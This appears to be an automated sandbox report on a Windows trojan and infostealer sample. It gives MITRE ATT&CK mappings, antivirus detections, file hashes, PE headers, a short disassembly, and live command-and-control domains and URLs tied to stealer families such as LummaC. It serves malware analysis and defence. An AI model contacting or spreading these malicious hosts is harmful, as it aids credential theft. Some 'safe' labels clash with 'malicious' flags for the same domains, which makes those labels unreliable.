              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\WSHEJMDVQC
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\BJZFPPWAPT
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\CZQKSDDMWR
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\HMPPSXQPQV
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\WSHEJMDVQC
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe | Directory queried: number of queries: 1001
              Source: Yara match | File source: 00000000.00000003.2095048923.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2095154387.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count of triggered signatures the report attaches to that technique)
              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
              Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd
              Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
              Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
              Defense Evasion: Virtualization/Sandbox Evasion (11); Deobfuscate/Decode Files or Information (1); DLL Side-Loading (1); Binary Padding; Software Packing
              Credential Access: OS Credential Dumping (1); Credential API Hooking (1); Security Account Manager; NTDS; LSA Secrets
              Discovery: Security Software Discovery (221); Virtualization/Sandbox Evasion (11); Process Discovery (1); File and Directory Discovery (2); System Information Discovery (112)
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
              Collection: Credential API Hooking (1); Archive Collected Data (1); Data from Local System (31); Input Capture; Keylogging
              Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Source | Detection | Scanner | Label
Lisect_AVT_24003_G1B_131.exe | 50% | ReversingLabs | Win32.Trojan.Generic
Lisect_AVT_24003_G1B_131.exe | 100% | Avira | TR/Redcap.yoqqs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
edurestunningcrackyow.fun | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
problemregardybuiwo.fun | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
https://resergvearyinitiani.shop/ | 0% | Avira URL Cloud | safe
pooreveningfuseor.pw | 0% | Avira URL Cloud | safe
https://resergvearyinitiani.shop/api | 100% | Avira URL Cloud | malware
technologyenterdo.shop | 100% | Avira URL Cloud | malware
associationokeo.shop | 100% | Avira URL Cloud | malware
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
turkeyunlikelyofw.shop | 100% | Avira URL Cloud | malware
detectordiscusser.shop | 100% | Avira URL Cloud | malware
http://www.microsoft. | 0% | Avira URL Cloud | safe
https://resergvearyinitiani.shop/apik | 0% | Avira URL Cloud | safe
resergvearyinitiani.shop | 0% | Avira URL Cloud | safe
lighterepisodeheighte.fun | 0% | Avira URL Cloud | safe
https://resergvearyinitiani.shop/f | 0% | Avira URL Cloud | safe
https://resergvearyinitiani.shop/)) | 0% | Avira URL Cloud | safe
https://resergvearyinitiani.shop/apiW | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
resergvearyinitiani.shop | 188.114.97.3 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
edurestunningcrackyow.fun | true | Avira URL Cloud: safe | unknown
problemregardybuiwo.fun | true | Avira URL Cloud: safe | unknown
technologyenterdo.shop | true | Avira URL Cloud: malware | unknown
pooreveningfuseor.pw | true | Avira URL Cloud: safe | unknown
associationokeo.shop | true | Avira URL Cloud: malware | unknown
https://resergvearyinitiani.shop/api | true | Avira URL Cloud: malware | unknown
turkeyunlikelyofw.shop | true | Avira URL Cloud: malware | unknown
detectordiscusser.shop | true | Avira URL Cloud: malware | unknown
resergvearyinitiani.shop | true | Avira URL Cloud: safe | unknown
lighterepisodeheighte.fun | true | Avira URL Cloud: safe | unknown
Name | Malicious | Antivirus Detection | Reputation | Source
https://duckduckgo.com/chrome_newtab | false | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp
https://duckduckgo.com/ac/?q= | false | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp
https://sectigo.com/CPS0 | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | false | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp
http://ocsp.sectigo.com0 | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe
https://resergvearyinitiani.shop/ | false | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmp
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | false | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp
http://crl.rootca1.amazontrust.com/rootca1.crl0 | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmp
http://www.microsoft. | false | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206913461.0000000000762000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207870757.0000000000763000.00000004.00000020.00020000.00000000.sdmp
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmp
http://ocsp.rootca1.amazontrust.com0: | false | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmp
https://www.ecosia.org/newtab/ | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmp
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmp
https://resergvearyinitiani.shop/apik | true | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095048923.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000745000.00000004.00000020.00020000.00000000.sdmp
https://ac.ecosia.org/autocomplete?q= | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmp
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe
https://resergvearyinitiani.shop/f | false | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmp
http://x1.c.lencr.org/0 | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmp
http://x1.i.lencr.org/0 | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmp
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe
https://resergvearyinitiani.shop/apiW | true | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000707000.00000004.00000020.00020000.00000000.sdmp
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmp
http://crt.rootca1.amazontrust.com/rootca1.cer0? | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmp
https://support.mozilla.org/products/firefoxgro.all | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmp
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | false | URL Reputation: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmp
https://resergvearyinitiani.shop/)) | false | Avira URL Cloud: safe | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000750000.00000004.00000020.00020000.00000000.sdmp
https://resergvearyinitiani.shop/apiK | true | | unknown | Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmp
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | resergvearyinitiani.shop | European Union | 13335 | CLOUDFLARENETUS | true
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1481247
                  Start date and time:2024-07-25 06:31:19 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 43s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Lisect_AVT_24003_G1B_131.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                  EGA Information:Failed
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Lisect_AVT_24003_G1B_131.exe, PID 4424 because there are no executed functions
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryDirectoryFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: Lisect_AVT_24003_G1B_131.exe
Time | Type | Description
00:32:14 | API Interceptor | 7x Sleep call for process: Lisect_AVT_24003_G1B_131.exe modified
Match: 188.114.97.3
Associated Sample Name / URL | Detection | Threat Name | Context
http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror | malicious | HTMLPhisher | kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror
Quotation.xls | malicious | Remcos | tny.wtf/jk8Z5I
NUEVO ORDEN01_202407238454854.pdf.exe | malicious | FormBook | www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
DRAFT AWB and DRAFT Commercial invoice.xls | malicious | Remcos | tny.wtf/cyd
QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/4jaIXkvS/download
QUOTATION_JULQTRA071244.PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/PM6yPStj/download
QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/0DmcWsUI/download
QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/4jaIXkvS/download
QUOTATION_JULQTRA071244.PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/PM6yPStj/download
Purchase Order - P04737.xls | malicious | Snake Keylogger, VIP Keylogger | tny.wtf/Dl

Match: resergvearyinitiani.shop
Associated Sample Name / URL | Detection | Threat Name | Context
CDssd7jEvY.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar | 104.21.94.2
SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar | 172.67.217.100
SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar | 172.67.217.100
WAhYftpepO.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar | 172.67.217.100
BuThoFHNNK.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | 104.21.94.2
6uVlPQSJ4e.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | 104.21.94.2
vHpxL6E2sQ.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader | 172.67.217.100
Vjt694rffx.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader | 172.67.217.100
file.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader | 104.21.94.2
wn1gncGy2T.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader | 104.21.94.2

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
Lisect_AVT_24003_G1B_57.exe | malicious | Unknown | 188.114.97.3
Lisect_AVT_24003_G1B_5.exe | malicious | Unknown | 172.64.41.3
https://emea.dcv.ms/V1nd75OZS4 | malicious | HTMLPhisher | 172.67.173.197
Lisect_AVT_24003_G1B_127.exe | malicious | PureLog Stealer | 104.18.20.226
Lisect_AVT_24003_G1B_24.exe | malicious | Unknown | 162.159.61.3
Lisect_AVT_24003_G1B_122.exe | malicious | Unknown | 172.67.70.65
DD Spotify Acc Gen.exe | malicious | Blank Grabber, Umbral Stealer | 162.159.138.232
Lisect_AVT_24003_G1B_127.exe | malicious | PureLog Stealer | 104.20.86.8
Lisect_AVT_24003_G1B_122.exe | malicious | Unknown | 172.67.70.65
Lisect_AVT_24003_G1A_84.exe | malicious | Bdaejec | 104.20.4.235

Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
Lisect_AVT_24003_G1B_127.exe | malicious | PureLog Stealer | 188.114.97.3
Lisect_AVT_24003_G1A_84.exe | malicious | Bdaejec | 188.114.97.3
LisectAVT_2403002B_493.exe | malicious | Unknown | 188.114.97.3
LisectAVT_2403002B_493.exe | malicious | Unknown | 188.114.97.3
LisectAVT_2403002B_473.exe | malicious | Unknown | 188.114.97.3
LisectAVT_2403002B_120.exe | malicious | Bdaejec, Raccoon | 188.114.97.3
LisectAVT_2403002A_270.exe | malicious | BlackMoon | 188.114.97.3
tGnix5uKlr.exe | malicious | Unknown | 188.114.97.3
JJY.exe | malicious | Bdaejec | 188.114.97.3
tGnix5uKlr.exe | malicious | Unknown | 188.114.97.3
                  No context
                  No created / dropped files found
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.834816988012452
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Lisect_AVT_24003_G1B_131.exe
                  File size:6'602'847 bytes
                  MD5:a2860db7149c32113ae0e57f4b3ab327
                  SHA1:6030980c88afc150475570118adb6fc5864ce27f
                  SHA256:e4e908772ae91c05f1f95ef06e1d70981db266c18717228da99d02df555b5725
                  SHA512:10b4a8dbac316a80c936fda31b15c54cf025a535787d04472c9931c0d22054a5d9c334d33577b4322f0cd3b83a1a20239f77cf774ac64885e98cfcc6544fd144
                  SSDEEP:196608:Vggwt0dDSNIB4Rmg2bjZYdyDhAGMlPIEPqAUcO/7RlHT:q1DIB4RmgvAWJBL2P
                  TLSH:42660193BA848D93C8561B34A847E09869F07C5B7F63A68373447B5E78733C0767638A
                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....-.e.................D..........r.............@.................................+.d...@...................................q....
                  Icon Hash:07f3e3b3b3bba8ab
                  Entrypoint:0xcdd372
                  Entrypoint Section:.&u&u
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x65D22D96 [Sun Feb 18 16:17:26 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:e317213dc6ffdcf0cccd57a171beb77d
                  Signature Valid:
                  Signature Issuer:
                  Signature Validation Error:
                  Error Number:
                  Not Before, Not After
                    Subject Chain
                      Version:
                      Thumbprint MD5:
                      Thumbprint SHA-1:
                      Thumbprint SHA-256:
                      Serial:
                      Instruction
                      call 00007F4548A9B509h
                      jmp 00007F4548A5A486h
                      mov es, word ptr [bp+di]
                      dec edi
                      jmp far E718h : 9DA59480h
                      mov esp, dword ptr [edx+edx*2+62521BA3h]
                      ret
                      stosb
                      mov byte ptr [82CAABA5h], al
                      pop ds
                      or cl, byte ptr [edx-5Ch]
                      xor esp, dword ptr [esi+22h]
                      jnle 00007F4548C078A5h
                      jle 00007F4548C078FEh
                      pushad
                      movsd
                      mov eax, dword ptr [2355E443h]
                      jnl 00007F4548C0794Bh
                      mov ah, ACh
                      or dh, byte ptr [edx+1B8D9E05h]
                      jmp 00007F44EF88A397h
                      jnl 00007F4548C0786Fh
                      jle 00007F4548C0793Ah
                      jne 00007F4548C078EAh
                      mov al, 69h
                      sub al, 9Ch
                      insd
                      jmp 00007F45C2B9C0D9h
                      cmp eax, 6261FAEBh
                      xchg eax, ebx
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x71e694 | 0xa0 | .&u&u
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x919000 | 0xe648d | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x64a600 | 0x1a58 | .&u&u
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x917000 | 0x1a44 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3b4000 | 0x4c | .&u&u
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x342cb | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
